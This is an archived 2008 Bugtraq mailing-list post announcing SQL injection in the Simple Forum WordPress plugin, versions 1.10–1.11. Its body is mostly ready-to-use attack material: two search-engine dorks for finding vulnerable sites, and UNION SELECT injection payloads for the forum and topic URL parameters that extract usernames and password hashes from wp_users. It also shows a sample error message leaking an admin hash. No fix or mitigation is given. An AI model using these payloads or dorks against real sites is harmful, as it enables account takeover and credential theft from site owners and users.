lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 15 Feb 2008 17:40:20 -0000
From: hackturkiye.hackturkiye@...il.com
To: bugtraq@...urityfocus.com
Subject: Simple Forum Version 1.10-1.11 SQL Injection

###############################################################
# 
#   Simple Forum Version 1.10-1.11 SQL Injection
#
###############################################################
#
# AUTHOR : S@BUN 
#
# HOME : http://www.milw0rm.com/author/1334
#        
# MA&#304;L : hackturkiye.hackturkiye@...il.com
#        
################################################################
   Simple Forum - Version 1.10
   
   Simple Forum - Version 1.10 - ( 2.1.3)

   Simple Forum - Version 1.11 

################################################################

 EXPLA&#304;N=

 sametimes password and username in error massege for axample you can see in

  (bazen &#351;ifreler hatalar&#305;n içindedir)

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '|admin|b8329b6e20b9f84f7b44ee678a5f484d| WHERE topic_id=-1/**/UNION/**/SELECT/**' at line 1]
UPDATE wp_sftopics SET topic_opened = |admin|b8329b6e20b9f84f7b44ee678a5f484d| WHERE topic_id=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

################################################################

  DORK 1 :  

  Simple Forum - Version 1.10
  Simple Forum - Version 1.10 - ( 2.1.3)
  Simple Forum - Version 1.11 
 
  DORK 2 :  allinurl: topic "forums?forum="

################################################################
   example

http://xxxxx/forums?forum=xxxx&topic= (expliot)

  EXPLO&#304;T 1 :

-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*  

   EXPLO&#304;T 2 :

S&#304;MET&#304;MES YOU CANT SEE (xxxx&topic) SOO USE TH&#304;S EXPLO&#304;T AFTER forum=xxx(number)

  example

www.xxxxx/forums?forum=1(expliot)

&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*


################################################################
# S@BUN             i AM NOT HACKER       S@BUN 
################################################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ